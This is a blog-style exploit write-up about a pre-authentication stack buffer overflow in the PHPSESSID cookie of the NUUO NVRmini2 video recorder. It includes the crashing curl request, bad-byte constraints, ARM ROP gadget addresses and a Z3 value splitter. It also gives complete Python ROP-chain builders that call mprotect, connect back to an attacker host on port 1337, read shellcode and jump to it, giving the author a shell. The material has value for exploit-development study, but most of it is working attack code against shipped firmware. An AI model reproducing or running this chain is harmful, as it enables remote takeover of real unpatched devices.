In may 2024 I attended a training course at OffensiveCon by the Flashback Team on vulnerability hunting in embedded devices and were in that class presented with a challenge to find and exploit a vulnerability in the NUUO NVRmini2 device.

This device is packed with vulnerabilities but I chose a buffer overflow in a PHPSESSID cookie which was preauth.

Exploiting the bug for command execution was…​pretty easy. But I want to run shellcode and that turned out to be a real challenge. Read on for how I finally got there.

Triggering the bug

You can trigger the vulnerability with this request:

$ curl -v --cookie PHPSESSID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBB 'http://target/cgi-bin/cgi_main?cmd=abc'

The above will run the binary /NUUO/bin/lite_mv (via a symlink called cgi_main).

At some point the binary will read the users session data which should be located on the file system in /tmp/sess_<SESSION ID>. This path is built using sprintf into a stack based buffer of size 128.

Providing a larger session id will overflow this buffer and 170 bytes down the line we will overwrite the return address which is stored on the stack.

A syscall trace of a crashing process looks like this:

[pid   520] open("/tmp/sess_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaBBBB", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid   520] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---

The environment

Ok, so we have a stack based buffer which we can easily overflow. The device has a 32 bit ARM processor and runs without ASLR but has NX, so we cannot simply return to shellcode. We will have to ROP this thing.

While playing around with this I found a great deal of bad bytes which I cannot use in my request:

bad_bytes = ( 0,1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 )

This is pretty annoying. I prefer to write exploits that would work in any environment, also with ASLR turned on and the main binary is not position independent so using gadgets from that would be fine.

But it is loaded at base address 0x00010000 so all addresses contain bad bytes. It is useless!

$ readelf -Wl lite_mv | grep LOAD
  LOAD           0x000000 0x00010000 0x00010000 0x39ab58 0x39ab58 R E 0x10000
  LOAD           0x39b000 0x003bb000 0x003bb000 0x0f6e8 0x1e4d0 RW  0x10000

So how would I overcome ASLR?

Well, the kernel only provides 12 bits of entropy for libraries giving 4096 possible load addresses so if we only use gadgets from one library we can guess an address and simply brute force our way in.

Every time we retry exploitation the library would be loaded at a new address and at some point this would be our target address.

To keep things brute forceable I will not hardcode addresses other than my gadgets which will all be from the same library.

But during development I turn off ASLR to make things simple. On my home VM libc was loaded on 0xb6852000 but during training it was loaded differently.

Why is this important?

With the many bad bytes many gadgets cannot be used. The gadgets I do use MUST be valid when loaded relative to those two addresses or my exploit would only work in either the training environment or my home environment.

I want them to work on both…​and if I had access to a real device I would also want them to work on that one as well.

Development environment

During development I have two ways of testing my code.

For the most part I use the Unicorn emulation engine for executing the code and my ROP chain.

I use LIEF for parsing ELF files and loading them into my Unicorn instance and during execution I use the Capstone engine for disassembling instructions.

Values in my ROP chain that only act as fillers have a special value (0xdeadbeef) so that I can easily spot them, and if I want a "breakpoint" I use an unmapped address again with a special value (0xc0debabe) which is easily recognizable.

That way Unicorn will make the emulation crash and I can dump the information that I need.

I use tmux, NeoVim and entr which let me run the exploit every time I save it:

Development environment

When I need a more thorough test I have a docker image which runs a Qemu full ARM system that I built using buildroot.

It is small but contains all that I need: ssh, strace, gdbserver and a kernel supporting the 9P filesystem.

That filesystem allows me to share a host path with the Qemu guest.

Inside the guest I can often with little hassle run the target binaries and do syscall tracing, debugging and dump core.

ROP strategy

So, I want shellcode execution. There are many strategies I could follow and I did a couple that did not work (I will get back to one of them later and why it failed) but ended up with this pseudo C code:

mprotect(0x10000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC);
s = socket(AF_INET, SOCK_STREAM, 0);
connect(s, {AF_INET, "192.168.0.7", 1337}, sizeof(struct sockaddr_in));
read(s, 0x10000, 8198);
((void(*)())0x10000)();

That is what I want my ROP chain to do…​.mark a mapped area as read+write+executable, connect to my host, read shellcode into that area and jump there.

What makes this challenging is the vast number of bad bytes. Most of these values contain bad bytes so they cannot be used directly.

Instead I will look for gadgets that can take two values and add/subtract/xor/whatever to get the real value.

This is the list of gadgets I used in my final exploit:

gadgets = {
    'ADD_R0_R3':        (0x00017fc0, 'add r0, r0, r3 ; pop {lr} ; bx lr'),
    'ADD_R3_R0_R3':     (0x00095b50, 'add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5'),
    'BX_R3':            (0x00017e9c, 'bx r3'),
    'MOV_R0_R4':        (0x0002bbf0, 'mov r0, r4 ; pop {r4, lr} ; bx lr'),
    'MOV_R1_R3':        (0x000185c8, 'mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr'),
    'MOV_R2_R0':        (0x000d77c8, 'mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3'),
    'MOV_R4_R0':        (0x000e2dc8, 'mov r4, r0 ; add r0, sp, #0xc8 ; blx r3'),
    'POP_HIGH':         (0x00017e98, 'pop {r4, r5, r6, lr} ; bx r3'),
    'POP_LOW':          (0x00107fb0, 'pop {r0, r1, r2, r3, pc}'),
    'POP_R0':           (0x0010796c, 'pop {r0, pc}'),
    'POP_R3':           (0x00018ba0, 'pop {r3, lr} ; bx lr'),
    'POP_R4_R5':        (0x001071b8, 'pop {r4, r5, pc}'),
    'STR_R0_R3':        (0x000c7684, 'str r0, [r3] ; pop {r3, lr} ; bx lr')
}

These all pass the test that they do not contain bad bytes when added to one of my two libc base addresses.

The first two will be used for building a value with bad bytes from two values without them.

I used the Z3 constraint solver for getting two good values from a bad one:

def add_up_to(n):
    s = z3.Solver()
    a = z3.BitVec("a", 32)
    b = z3.BitVec("b", 32)
    s.add((a + b) == n)
    for bad in bad_bytes:
        for n in (a, b):
            for i in range(4):
                s.add(((n >> (i * 8)) & 0xff) != bad)

    if s.check() != z3.sat:
        raise Exception("Unsatisfiable")
    m = s.model()
    a = m.evaluate(a)
    b = m.evaluate(b)
    return (a.as_long(), b.as_long())

Testing this in a python repl:

>>> a, b = add_up_to(0x01000200)
>>> print(f"0x{a:08x} + 0x{b:08x} = 0x{(a+b) & 0xffffffff:08x}")
0x6f7f2191 + 0x9180e06f = 0x01000200

Building the ROP chain

Usually when building ROP chains I simply write something similar to this:

rop = flat([
    # mprotect(0x010000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC)
    # r0 <- 0x010000
    POP_R0,
    # pop {r0, pc}
    0x010000, # r0 = 0x010000
    POP_R3,   # pc
    ....
    # socket(AF_INET, SOCK_STREAM, 0)
    ...
])

But since this environment is so restricted by bad bytes this would quickly become a hassle.

Also what I want is to run a series of four libc functions all with no more than three arguments so my chain should consist of four similar blocks of gadgets.

Therefore I built a ROP chain building tool to help me out. It has three functions for building parts of a ROP chain and one using these to build the final chain.

The one that builds the final ROP chain is this one:

    def connect_to_shellcode(self, host: Host) -> bytes:
        addr = 0x10000
        jmp      = self.jump_to(addr)
        read     = self.call(self.READ, 3, addr, 4096 * 2, jmp[0])
        connect  = self.call(self.CONNECT, 3, addr, 16, read[0])
        sockaddr = self.poke(sockaddr_in(host.addr, host.port), addr, connect[0])
        socket   = self.call(self.SOCKET, int(constants.AF_INET), int(constants.SOCK_STREAM), 0, sockaddr[0])
        mprotect = self.call(self.MPROTECT, addr, 4096 * 2, 7, socket[0])

        return flat([
            mprotect[0],
            mprotect[1],
            socket[1],
            sockaddr[1],
            connect[1],
            read[1],
            jmp[1]
        ])

The jump_to, call and poke methods will be described later. They return a tuple containing a gadget for starting the chain and the actual chain as a byte array.

The gadget is used for chaining the sub chains together. Those three methods are nasty as shit but using them was a real pleasure. It would be very easy to add more calls should the need arise.

Now lets look into the ROP builders.

jump_to(self, addr: int) → tuple[int, bytes]

This is the simplest one so lets start with that. We will use it to jump to the final shellcode which may lie at an address containing bad bytes.

It is implemented like this:

def jump_to(self, addr: int) -> tuple[int, bytes]:
    addr_1, addr_2 = add_up_to(addr)
    return (
        self.POP_R4_R5,
        flat([
            # Gadget 1 : pop {r4, r5, pc}
            GARBAGE,  # r4
            self.BX_R3,  # r5 - Gadget 5
            self.POP_R0, # pc - Gadget 2
            # Gadget 2 : pop {r0, pc}
            addr_1,      # r0
            self.POP_R3, # pc - Gadget 3
            # Gadget 3 : pop {r3, lr} ; bx lr
            addr_2,            # r3
            self.ADD_R3_R0_R3, # lr - Gadget 4
            # Gadget 4 - add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
            # Gadget 5 - bx r3
        ])
    )

We start by splitting the target address into two bad bytes free values that when added together will give us back the target address.

Gadget 4 will add r0 to r3 and branch to r5 which is why we start the chain at gadget 1 with a snippet that lets us write into r5. It will also write to r4 but since I don’t need that I put GARBAGE there.

Next gadget 2 will put the first value into r0 and gadget 3 will put the second value into r3.

Then gadget 4 adds these two together into r3 and branch off into the final gadget 5 which branches into our target address.

This is pretty much how the other more complex chains work too.

poke(self, what: bytes, where: int, next_gadget: int) → tuple[int,bytes]

This function is responsible for writing a byte array to an address. It is used for building an sockaddr_in structure at a known location.

This is actually only a wrapper function that splits the byte array into blocks of four bytes and builds a chain that writes all of these blocks one at a time so let’s instead look at how a single block is written

_write_what_where(self, what: int, where: int, next_gadget: int) → tuple[int,bytes]:

This function will build a chain for writing the value in what to the address in where and then continuing to next_gadget.

Both the what and where can contain bad bytes so that needs to be handled. The function is implemented like so:

def _write_what_where(self, what: int, where: int, next_gadget: int) -> tuple[int,bytes]:
    what_1, what_2 = add_up_to(what)
    where_1, where_2 = add_up_to(where)
    return (
        self.POP_R4_R5, # The gadget that gets the ball rolling...Gadget 1
        flat([
            # Gadget 1 : pop {r4, r5, pc}
            GARBAGE,  # r4
            self.MOV_R0_R4, # r5 - Gadget 10
            self.POP_R0,    # pc - Gadget 2
            # Gadget 2 : pop {r0, pc}
            what_1,      # r0
            self.POP_R3,    # pc - Gadget 3
            # Gadget 3 : pop {r3, lr} ; bx lr
            what_2,      # r3
            self.ADD_R0_R3, # lr - Gadget 4
            # Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
            self.POP_R3, # lr - Gadget 5
            # Gadget 5 : pop {r3, lr} ; bx lr
            self.POP_LOW,    # r3 - Gadget 8
            self.MOV_R4_R0, # lr - Gadget 7
            # Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3

            # Gadget 8 : pop {r0, r1, r2, r3, pc}
            where_1,        # r0
            GARBAGE,     # r1
            GARBAGE,     # r2
            where_2,        # r3
            self.ADD_R3_R0_R3, # pc - Gadget 9
            # Gadget 9 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
            # Gadget 10 : mov r0, r4 ; pop {r4, lr} ; bx lr
            GARBAGE,  # r4
            self.STR_R0_R3, # lr - Gadget 11
            # Gadget 11 - str r0, [r3] ; pop {r3, lr} ; bx lr
            GARBAGE,  # r3
            next_gadget  # lr - Next gadget
    ]))

The series of instruction that actually writes to memory is this: str r0, [r3] ; pop {r3, lr} ; bx lr

So we need the what value in r0 and where in r3. Again we use the add gadget that ends up jumping to r5 which is why we start by writing to r5 at gadget 1.

Next at gadget 2-7 we put the two what values into r0 and r3, add them together and store the result away in r4. We move the value to r4 so that we can calculate the where value without loosing our newly calculated what value.

Gadget 8 and 9 put the two where values into r0 and r3 and add them together into r3.

Gadget 10 moves the what value from r4 back into r0 and now we are ready for gadget 11 that writes the value to the address and finally we can move on to the next gadget which was provided to the function.

def call(self, func: int, r0: int, r1: int, r2: int, next_gadget: int) → tuple[int,bytes]:

This function is insane!

When a function is called in the ARM architecture we use the blx (branch and link) instruction. This will put the return address into the lr register and transfer control to the target function which will read its arguments from r0, r1 and r2 (for three argument functions), do its stuff and return to the address in lr.

This means that we need to put possibly bad byte values into r0, r1 and r2, put the next gadget into lr and branch off into the function…​.oh, and by the way, two of the functions I want to call lie on addresses with bad bytes, so the func argument also needs to handle bad bytes.

The next_gadget argument may not contain bad bytes because it is called when everything is done and thus we can find a gadget that is bad byte free easily.

I did find a chain for setting r0, r1, r2 and lr but jumping to that function proved…​difficult but solvable.

In the case where the function contains bad bytes I prepend a chain the calculates the address and then writes it to the stack at the right offset so that I can simply ignore the fact that it is bad. I then simply write 0x44444444 instead.

Let’s start with the chain that sets registers and calls the function and ignore that the function may contain bad bytes.

def call(self, func: int, r0: int, r1: int, r2: int, next_gadget: int) -> tuple[int,bytes]:
    r0_1, r0_2 = add_up_to(r0)
    r1_1, r1_2 = add_up_to(r1)
    r2_1, r2_2 = add_up_to(r2)

    first_gadget = self.POP_LOW
    callsite_modifier = b""
    ....

    return (
        first_gadget,
        flat([
            callsite_modifier,
            # First set r2
            # Gadget 1 : pop {r0, r1, r2, r3, pc}
            r2_1,        # r0
            GARBAGE,  # r1
            GARBAGE,  # r2
            r2_2,        # r3
            self.ADD_R0_R3, # pc - Gadget 2
            # Gadget 2 : add r0, r0, r3 ; pop {lr} ; bx lr
            self.POP_R3,  # lr - Gadget 3
            # Gadget 3 : pop {r3, lr} ; bx lr
            self.POP_R0,    # r3 - Gadget 5
            self.MOV_R2_R0, # lr - Gadget 4
            # Gadget 4 : mov r2, r0 ; ldr r0, [pc, #0x3fc] ; moveq r0, ip ; blx r3

            # Next set r1
            # Gadget 5 : pop {r0, pc}
            r1_1,      # r0
            self.POP_R3,  # pc - Gadget 6
            # Gadget 6 : pop {r3, lr} ; bx lr
            r1_2,        # r3
            self.POP_R4_R5, # lr - Gadget 7
            # Gadget 7 : pop {r4, r5, pc}
            GARBAGE,     # r4
            self.MOV_R1_R3,    # r5 - Gadget 9
            self.ADD_R3_R0_R3, # pc - Gadget 8
            # Gadget 8 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
            # Gadget 9 : mov r1, r3 ; add sp, sp, #8 ; pop {r4, lr} ; bx lr
            GARBAGE,  # Skipped
            GARBAGE,  # Skipped
            GARBAGE,  # r4
            self.POP_R0,    # lr - Gadget 10

            # Last set r0
            # Gadget 10 : pop {r0, pc}
            r0_1,     # r0
            self.POP_R3, # pc - Gadget 11
            # Gadget 11 : pop {r3, lr} ; bx lr
            r0_2,        # r3
            self.ADD_R0_R3, # lr - Gadget 12
            # Gadget 12 : add r0, r0, r3 ; pop {lr} ; bx lr
            self.POP_R3,   # lr : Gadget 13

            # Gadget 13 : pop {r3, lr} ; bx lr
            func,        # r3 - Gadget 15
            self.POP_HIGH,  # lr - Gadget 14
            # Gadget 14 : pop {r4, r5, r6, lr} ; bx r3
            GARBAGE,   # r4
            GARBAGE,   # r5
            GARBAGE,   # r6
            next_gadget,   # lr - Gadget 15
            # Gadget 15 : func(r0, r1, r2)
        ])
    )

Gadgets 1-4 sets r2 using simple pop, add and mov gadgets. You should be able to read this by now.

Next gadget 5-9 set r1 without touching r2.

Gadget 10-14 set lr to the next_gadget address and r3 to the target function address and finally jumps to r3.

The func value is popped off the stack in gagdet 13. If that address contains bad bytes we prepend the following chain through the callsite_modifier variable which is otherwise an empty byte array.

if check(func) == False:
    # Function contains bad bytes. Prepend chain that sets it
    first_gadget = self.POP_R4_R5
    func_1, func_2 = add_up_to(func)
    offset_1, offset_2 = add_up_to(0xffffffbc)
    func = 0x44444444
    callsite_modifier = flat([
        # Gadget 1 : pop {r4, r5, pc}
        GARBAGE,  # r4
        self.MOV_R0_R4, # r5 - Gadget 12
        self.POP_R0,    # pc - Gadget 2
        # Gadget 2 : pop {r0, pc}
        func_1,   # r0
        self.POP_R3,  # pc - Gadget 3
        # Gadget 3 : pop {r3, lr} ; bx lr
        func_2,   # r3
        self.ADD_R0_R3, # lr - Gadget 4
        # Gadget 4 : add r0, r0, r3 ; pop {lr} ; bx lr
        self.POP_R3, # lr - Gadget 5
        # Gadget 5 : pop {r3, lr} ; bx lr
        self.POP_R3,    # r3 - Gadget 8
        self.MOV_R4_R0, # lr - Gadget 7

        # Gadget 7 : mov r4, r0 ; add r0, sp, #0xc8 ; blx r3
        # Gadget 8 : pop {r3, lr} ; bx lr
        offset_1, # r3
        self.ADD_R0_R3,    # lr - Gadget 9
        # Gadget 9 : add r0, r0, r3 ; pop {lr} ; bx lr
        self.POP_R3,  # lr - Gadget 10
        # Gadget 10 : pop {r3, lr} ; bx lr
        offset_2, # r3
        self.ADD_R3_R0_R3, # lr - Gadget 11
        # Gadget 11 : add r3, r0, r3 ; sub r0, fp, #0x34 ; blx r5
        # Gadget 12 : mov r0, r4 ; pop {r4, lr} ; bx lr
        GARBAGE,  # r4
        self.STR_R0_R3, # lr - Gadget 13
        # Gadget 13 : str r0, [r3] ; pop {r3, lr} ; bx lr
        GARBAGE, # r3
        self.POP_LOW,  # lr - Gadget 14
    ])

Gadgets 1-7 calculate the target address and store it away in r4 like we have seen previously.

Gadget 7 further puts the stack pointer into r0.

Gadget 8-11 adds an offset to this stack address to find the spot where our target address need to be and put this address into r3.

Gadget 12 and 13 first move the target address to r0 and then write it to r3 so now we have the right target address on the stack ready for the remaining chain.

Nice, huh?

Drum roll

So, does it work?

My exploit can run both emulated with different levels of verbosity and against an actual target. My target is an ssh tunnel pointing to my ARM based VM:

Exploit running

Yes. Yes, it does.

The shellcode for the emulator simply writes to stdout and then exits. The one I send to the actual target gives me a shell.

Get my final exploit here.

Failed attempts

I tried other simpler solutions before landing on the above madness.

I pretty quickly realized that I needed something that could write arbitrary data to arbitrary addresses so the poke function was the first one I did.

Having that I thought to myself…​why not first mprotect a page and simply poke shellcode using the ROP chain?

I did that and the chain for a fairly small shellcode ended up being more than 4KB large and apparently that was too much because not all of it ran.

This was a fun challenge!